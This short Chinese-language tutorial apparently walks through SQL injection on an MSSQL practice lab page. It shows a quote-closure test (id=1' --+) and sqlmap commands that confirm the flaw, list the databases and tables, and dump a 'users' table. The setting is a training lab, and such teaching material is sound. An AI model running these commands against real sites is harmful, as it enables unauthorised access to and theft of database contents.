简介

     SQL注入是一种安全漏洞，通过它可以执行意外的SQL命令或访问数据库中的信息。MSSQL注入通常发生在应用程序将用户输入作为SQL查询的一部分执行时，而没有对输入进行适当的验证或清理。

以下是MSSQL手工注入的流程：

一、打开靶场选择第一关

 

二、确定注入点

测试不同的闭合方式

这里确定为 id=1' --+

三、查找是否存在 sql 漏洞

 使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 ，在kali在输入语句，确定存在 sql 漏洞

四、查找库名

使用语句  sqlmap -u http://192.168.213.200/less-1.asp?id=1 --dbs --batch

五、查找表名

使用语句  sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test --tables --batch

 

六、得到表中的数据

使用语句  sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test -T users --dump --batch

安全

网络安全靠人民，网络安全为人民